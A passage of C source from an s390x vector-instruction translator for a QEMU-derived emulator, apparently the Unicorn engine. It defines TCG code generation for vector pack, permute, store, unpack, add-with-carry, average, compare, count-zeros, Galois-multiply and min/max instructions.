es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0x97: if (get_field(s, m5) & 0x1) { gen_gvec_3_ptr(tcg_ctx, v1, v2, v3, tcg_ctx->cpu_env, 0, vpks_cc[es - 1]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, v1, v2, v3, 0, vpks[es - 1]); } break; case 0x95: if (get_field(s, m5) & 0x1) { gen_gvec_3_ptr(tcg_ctx, v1, v2, v3, tcg_ctx->cpu_env, 0, vpkls_cc[es - 1]); set_cc_static(s); } else { gen_gvec_3_ool(tcg_ctx, v1, v2, v3, 0, vpkls[es - 1]); } break; case 0x94: /* If sources and destination don't overlap -> fast path */ if (v1 != v2 && v1 != v3) { const uint8_t src_es = get_field(s, m4); const uint8_t dst_es = src_es - 1; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); int dst_idx, src_idx; for (dst_idx = 0; dst_idx < NUM_VEC_ELEMENTS(dst_es); dst_idx++) { src_idx = dst_idx; if (src_idx < NUM_VEC_ELEMENTS(src_es)) { read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, src_es); } else { src_idx -= NUM_VEC_ELEMENTS(src_es); read_vec_element_i64(tcg_ctx, tmp, v3, src_idx, src_es); } write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, dst_es); } tcg_temp_free_i64(tcg_ctx, tmp); } else { gen_gvec_3_ool(tcg_ctx, v1, v2, v3, 0, vpk[es - 1]); } break; default: g_assert_not_reached(); } return DISAS_NEXT; } static DisasJumpType op_vperm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_4_ool(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), 0, gen_helper_gvec_vperm); return DISAS_NEXT; } static DisasJumpType op_vpdi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t i2 = extract32(get_field(s, m4), 2, 1); const uint8_t i3 = extract32(get_field(s, m4), 0, 1); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64
t1 = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, t0, get_field(s, v2), i2, ES_64); read_vec_element_i64(tcg_ctx, t1, get_field(s, v3), i3, ES_64); write_vec_element_i64(tcg_ctx, t0, get_field(s, v1), 0, ES_64); write_vec_element_i64(tcg_ctx, t1, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_vrep(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t enr = get_field(s, i2); const uint8_t es = get_field(s, m4); if (es > ES_64 || !valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tcg_gen_gvec_dup_mem(tcg_ctx, es, vec_full_reg_offset(get_field(s, v1)), vec_reg_offset(get_field(s, v3), enr, es), 16, 16); return DISAS_NEXT; } static DisasJumpType op_vrepi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int64_t data = (int16_t)get_field(s, i2); const uint8_t es = get_field(s, m3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_dupi(tcg_ctx, es, get_field(s, v1), data); return DISAS_NEXT; } static DisasJumpType op_vsce(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), enr, es); tcg_gen_add_i64(tcg_ctx, o->addr1, o->addr1, tmp); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 0); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vsel(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_4(tcg_ctx, bitsel, ES_8, get_field(s, v1), get_field(s, v4), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vseg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); int idx1, idx2; TCGv_i64 tmp; switch (es) { case ES_8: idx1 = 7; idx2 = 15; break; case ES_16: idx1 = 3; idx2 = 7; break; case ES_32: idx1 = 1; idx2 = 3; break; default: gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), idx1, es | MO_SIGN); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 0, ES_64); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v2), idx2, es | MO_SIGN); write_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 1, ES_64); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tmp = tcg_const_i64(tcg_ctx, 16); /* Probe write access before actually modifying memory */ gen_helper_probe_write_access(tcg_ctx, tcg_ctx->cpu_env, o->addr1, tmp); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 0, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), 1, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vste(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; 
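/* VECTOR STORE ELEMENT: stores the single element of v1 selected by the
 * m3 field to the effective address; the element size is taken from
 * insn->data, and an element number that is out of range for that size
 * raises a specification exception below. */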
const uint8_t es = s->insn->data; const uint8_t enr = get_field(s, m3); TCGv_i64 tmp; if (!valid_vec_element(enr, es)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, tmp, get_field(s, v1), enr, es); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TE | es); tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vstm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v3 = get_field(s, v3); uint8_t v1 = get_field(s, v1); TCGv_i64 tmp; if (v3 < v1 || (v3 - v1 + 1) > 16) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } /* Probe write access before actually modifying memory */ tmp = tcg_const_i64(tcg_ctx, (v3 - v1 + 1) * 16); gen_helper_probe_write_access(tcg_ctx, tcg_ctx->cpu_env, o->addr1, tmp); for (;; v1++) { read_vec_element_i64(tcg_ctx, tmp, v1, 0, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); read_vec_element_i64(tcg_ctx, tmp, v1, 1, ES_64); tcg_gen_qemu_st_i64(tcg_ctx, tmp, o->addr1, get_mem_index(s), MO_TEQ); if (v1 == v3) { break; } gen_addi_and_wrap_i64(s, o->addr1, o->addr1, 8); } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_vstl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int v1_offs = vec_full_reg_offset(get_field(s, v1)); TCGv_ptr a0 = tcg_temp_new_ptr(tcg_ctx); /* convert highest index into an actual length */ tcg_gen_addi_i64(tcg_ctx, o->in2, o->in2, 1); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, v1_offs); gen_helper_vstl(tcg_ctx, tcg_ctx->cpu_env, a0, o->addr1, o->in2); tcg_temp_free_ptr(tcg_ctx, a0); return DISAS_NEXT; } static DisasJumpType op_vup(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const bool logical = s->fields.op2 == 0xd4 || s->fields.op2 == 0xd5; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t src_es = get_field(s, m3); const uint8_t dst_es = src_es + 1; int dst_idx, src_idx; TCGv_i64 tmp; if (src_es > ES_32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tmp = tcg_temp_new_i64(tcg_ctx); if (s->fields.op2 == 0xd7 || s->fields.op2 == 0xd5) { /* iterate backwards to avoid overwriting data we might need later */ for (dst_idx = NUM_VEC_ELEMENTS(dst_es) - 1; dst_idx >= 0; dst_idx--) { src_idx = dst_idx; read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, src_es | (logical ? 0 : MO_SIGN)); write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, dst_es); } } else { /* iterate forward to avoid overwriting data we might need later */ for (dst_idx = 0; dst_idx < NUM_VEC_ELEMENTS(dst_es); dst_idx++) { src_idx = dst_idx + NUM_VEC_ELEMENTS(src_es) / 2; read_vec_element_i64(tcg_ctx, tmp, v2, src_idx, src_es | (logical ?
0 : MO_SIGN)); write_vec_element_i64(tcg_ctx, tmp, v1, dst_idx, dst_es); } } tcg_temp_free_i64(tcg_ctx, tmp); return DISAS_NEXT; } static DisasJumpType op_va(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, tcg_gen_add2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_fn_3(tcg_ctx, add, es, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static void gen_acc(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b, uint8_t es) { const uint8_t msb_bit_nr = NUM_VEC_ELEMENT_BITS(es) - 1; TCGv_i64 msb_mask = tcg_const_i64(tcg_ctx, dup_const(es, 1ull << msb_bit_nr)); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); /* Calculate the carry into the MSB, ignoring the old MSBs */ tcg_gen_andc_i64(tcg_ctx, t1, a, msb_mask); tcg_gen_andc_i64(tcg_ctx, t2, b, msb_mask); tcg_gen_add_i64(tcg_ctx, t1, t1, t2); /* Calculate the MSB without any carry into it */ tcg_gen_xor_i64(tcg_ctx, t3, a, b); /* Calculate the carry out of the MSB in the MSB bit position */ tcg_gen_and_i64(tcg_ctx, d, a, b); tcg_gen_and_i64(tcg_ctx, t1, t1, t3); tcg_gen_or_i64(tcg_ctx, d, d, t1); /* Isolate and shift the carry into position */ tcg_gen_and_i64(tcg_ctx, d, d, msb_mask); tcg_gen_shri_i64(tcg_ctx, d, d, msb_bit_nr); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static void gen_acc8_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { gen_acc(tcg_ctx, d, a, b, ES_8); } static void gen_acc16_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { gen_acc(tcg_ctx, d, a, b, ES_16); } static void gen_acc_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t, a, b); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, d, t, b); tcg_temp_free_i32(tcg_ctx, t); } static void gen_acc_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_add_i64(tcg_ctx, t, a, b); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_LTU, d, t, b); tcg_temp_free_i64(tcg_ctx, t); } static void gen_acc2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh) { TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_add2_i64(tcg_ctx, tl, th, al, zero, bl, zero); tcg_gen_add2_i64(tcg_ctx, tl, th, th, zero, ah, zero); tcg_gen_add2_i64(tcg_ctx, tl, dl, tl, th, bh, zero); tcg_gen_mov_i64(tcg_ctx, dh, zero); tcg_temp_free_i64(tcg_ctx, th); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vacc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fni8 = gen_acc8_i64, }, { .fni8 = gen_acc16_i64, }, { .fni4 = gen_acc_i32, }, { .fni8 = gen_acc_i64, }, }; if (es > ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } else if (es == ES_128) { gen_gvec128_3_i64(tcg_ctx, gen_acc2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static void 
gen_ac2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 th = tcg_const_i64(tcg_ctx, 0); /* extract the carry only */ tcg_gen_extract_i64(tcg_ctx, tl, cl, 0, 1); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, ah, bl, bh); tcg_gen_add2_i64(tcg_ctx, dl, dh, dl, dh, tl, th); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); } static DisasJumpType op_vac(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_ac2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static void gen_accc2_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 dh, TCGv_i64 al, TCGv_i64 ah, TCGv_i64 bl, TCGv_i64 bh, TCGv_i64 cl, TCGv_i64 ch) { TCGv_i64 tl = tcg_temp_new_i64(tcg_ctx); TCGv_i64 th = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_andi_i64(tcg_ctx, tl, cl, 1); tcg_gen_add2_i64(tcg_ctx, tl, th, tl, zero, al, zero); tcg_gen_add2_i64(tcg_ctx, tl, th, tl, th, bl, zero); tcg_gen_add2_i64(tcg_ctx, tl, th, th, zero, ah, zero); tcg_gen_add2_i64(tcg_ctx, tl, dl, tl, th, bh, zero); tcg_gen_mov_i64(tcg_ctx, dh, zero); tcg_temp_free_i64(tcg_ctx, tl); tcg_temp_free_i64(tcg_ctx, th); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vaccc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (get_field(s, m5) != ES_128) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec128_4_i64(tcg_ctx, gen_accc2_i64, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4)); return DISAS_NEXT; } static DisasJumpType op_vn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, and, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vnc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, andc, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static void gen_avg_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, a); tcg_gen_ext_i32_i64(tcg_ctx, t1, b); tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_addi_i64(tcg_ctx, t0, t0, 1); tcg_gen_shri_i64(tcg_ctx, t0, t0, 1); tcg_gen_extrl_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_avg_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 al, TCGv_i64 bl) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 ah = tcg_temp_new_i64(tcg_ctx); TCGv_i64 bh = tcg_temp_new_i64(tcg_ctx); /* extending the sign by one bit is sufficient */ tcg_gen_extract_i64(tcg_ctx, ah, al, 63, 1); tcg_gen_extract_i64(tcg_ctx, bh, bl, 63, 1); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, ah, bl, bh); gen_addi2_i64(tcg_ctx, dl, dh, dl, dh, 1); tcg_gen_extract2_i64(tcg_ctx, dl, dl, dh, 1); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, ah); tcg_temp_free_i64(tcg_ctx, bh); } static DisasJumpType op_vavg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vavg8, }, { .fno = gen_helper_gvec_vavg16, }, { .fni4 = gen_avg_i32, }, { .fni8 = gen_avg_i64, }, }; if 
(es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static void gen_avgl_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t0, a); tcg_gen_extu_i32_i64(tcg_ctx, t1, b); tcg_gen_add_i64(tcg_ctx, t0, t0, t1); tcg_gen_addi_i64(tcg_ctx, t0, t0, 1); tcg_gen_shri_i64(tcg_ctx, t0, t0, 1); tcg_gen_extrl_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_avgl_i64(TCGContext *tcg_ctx, TCGv_i64 dl, TCGv_i64 al, TCGv_i64 bl) { TCGv_i64 dh = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); tcg_gen_add2_i64(tcg_ctx, dl, dh, al, zero, bl, zero); gen_addi2_i64(tcg_ctx, dl, dh, dl, dh, 1); tcg_gen_extract2_i64(tcg_ctx, dl, dl, dh, 1); tcg_temp_free_i64(tcg_ctx, dh); tcg_temp_free_i64(tcg_ctx, zero); } static DisasJumpType op_vavgl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vavgl8, }, { .fno = gen_helper_gvec_vavgl16, }, { .fni4 = gen_avgl_i32, }, { .fni8 = gen_avgl_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vcksm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 sum = tcg_temp_new_i32(tcg_ctx); int i; read_vec_element_i32(tcg_ctx, sum, get_field(s, v3), 1, ES_32); for (i = 0; i < 4; i++) { read_vec_element_i32(tcg_ctx, tmp, get_field(s, v2), i, ES_32); tcg_gen_add2_i32(tcg_ctx, tmp, sum, sum, sum, tmp, tmp); } zero_vec(tcg_ctx, get_field(s, v1)); write_vec_element_i32(tcg_ctx, sum, get_field(s, v1), 1, ES_32); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, sum); return DISAS_NEXT; } static DisasJumpType op_vec(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint8_t es = get_field(s, m3); const uint8_t enr = NUM_VEC_ELEMENTS(es) / 2 - 1; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (s->fields.op2 == 0xdb) { es |= MO_SIGN; } o->in1 = tcg_temp_new_i64(tcg_ctx); o->in2 = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, o->in1, get_field(s, v1), enr, es); read_vec_element_i64(tcg_ctx, o->in2, get_field(s, v2), enr, es); return DISAS_NEXT; } static DisasJumpType op_vc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); TCGCond cond = s->insn->data; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tcg_gen_gvec_cmp(tcg_ctx, cond, es, vec_full_reg_offset(get_field(s, v1)), vec_full_reg_offset(get_field(s, v2)), vec_full_reg_offset(get_field(s, v3)), 16, 16); if (get_field(s, m5) & 0x1) { TCGv_i64 low = tcg_temp_new_i64(tcg_ctx); TCGv_i64 high = tcg_temp_new_i64(tcg_ctx); read_vec_element_i64(tcg_ctx, high, get_field(s, v1), 0, ES_64); read_vec_element_i64(tcg_ctx, low, get_field(s, v1), 1, ES_64); gen_op_update2_cc_i64(s, CC_OP_VC, low, high); tcg_temp_free_i64(tcg_ctx, low); tcg_temp_free_i64(tcg_ctx, high); } return DISAS_NEXT; } static void gen_clz_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a) { tcg_gen_clzi_i32(tcg_ctx, d, a, 32); } 
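/* Note: the trailing constant passed to tcg_gen_clzi_i32/_i64 is the value
 * returned for a zero input, so using the element width (32 or 64) yields
 * clz(0) == number of element bits, as count-leading-zeros requires. */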
static void gen_clz_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a) { tcg_gen_clzi_i64(tcg_ctx, d, a, 64); } static DisasJumpType op_vclz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); static const GVecGen2 g[4] = { { .fno = gen_helper_gvec_vclz8, }, { .fno = gen_helper_gvec_vclz16, }, { .fni4 = gen_clz_i32, }, { .fni8 = gen_clz_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2(tcg_ctx, get_field(s, v1), get_field(s, v2), &g[es]); return DISAS_NEXT; } static void gen_ctz_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a) { tcg_gen_ctzi_i32(tcg_ctx, d, a, 32); } static void gen_ctz_i64(TCGContext *tcg_ctx, TCGv_i64 d, TCGv_i64 a) { tcg_gen_ctzi_i64(tcg_ctx, d, a, 64); } static DisasJumpType op_vctz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); static const GVecGen2 g[4] = { { .fno = gen_helper_gvec_vctz8, }, { .fno = gen_helper_gvec_vctz16, }, { .fni4 = gen_ctz_i32, }, { .fni8 = gen_ctz_i64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_2(tcg_ctx, get_field(s, v1), get_field(s, v2), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_gvec_fn_3(tcg_ctx, xor, ES_8, get_field(s, v1), get_field(s, v2), get_field(s, v3)); return DISAS_NEXT; } static DisasJumpType op_vgfm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m4); static const GVecGen3 g[4] = { { .fno = gen_helper_gvec_vgfm8, }, { .fno = gen_helper_gvec_vgfm16, }, { .fno = gen_helper_gvec_vgfm32, }, { .fno = gen_helper_gvec_vgfm64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_3(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vgfma(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m5); static const GVecGen4 g[4] = { { .fno = gen_helper_gvec_vgfma8, }, { .fno = gen_helper_gvec_vgfma16, }, { .fno = gen_helper_gvec_vgfma32, }, { .fno = gen_helper_gvec_vgfma64, }, }; if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_4(tcg_ctx, get_field(s, v1), get_field(s, v2), get_field(s, v3), get_field(s, v4), &g[es]); return DISAS_NEXT; } static DisasJumpType op_vlc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_fn_2(tcg_ctx, neg, es, get_field(s, v1), get_field(s, v2)); return DISAS_NEXT; } static DisasJumpType op_vlp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t es = get_field(s, m3); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } gen_gvec_fn_2(tcg_ctx, abs, es, get_field(s, v1), get_field(s, v2)); return DISAS_NEXT; } static DisasJumpType op_vmx(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const uint8_t v1 = get_field(s, v1); const uint8_t v2 = get_field(s, v2); const uint8_t v3 = get_field(s, v3); const uint8_t es = get_field(s, m4); if (es > ES_64) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } switch (s->fields.op2) { case 0xff: gen_gvec_fn_3(tcg_ctx, smax, es, v1, v2, v3); break; 
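/*
 * The second opcode byte picks the flavour here: 0xff = VMX (signed
 * max), 0xfd = VMXL (unsigned max), 0xfe = VMN (signed min), 0xfc =
 * VMNL (unsigned min). Scalar shape of a signed/unsigned pair:
 *
 *   static int64_t  smax64(int64_t a, int64_t b)   { return a > b ? a : b; }
 *   static uint64_t umax64(uint64_t a, uint64_t b) { return a > b ? a : b; }
 */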
case 0xfd: gen_gvec_fn_3(tcg_ctx, umax, es, v1, v2, v3); break; case 0xfe: gen_gvec_fn_3(tcg_ctx, smin, es, v1, v2, v3); break; case 0xfc: gen_gvec_fn_3(tcg_ctx, umin, es, v1, v2, v3); break; default: g_assert_not_reached(); } return DISAS_NEXT; } static void gen_mal_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, TCGv_i32 c) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mul_i32(tcg_ctx, t0, a, b); tcg_gen_add_i32(tcg_ctx, d, t0, c); tcg_temp_free_i32(tcg_ctx, t0); } static void gen_mah_i32(TCGContext *tcg_ctx, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b, TCGv_i32 c) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t0, a); tcg_gen_ext_i32_i64(tcg_ctx, t1, b); tcg_gen_ext_i32_i64(tcg_ctx, t2, c); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_add_i64(tcg_ctx, t0, t0, t2); tcg_gen_extrh_i64_i32(tcg_ctx, d, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); 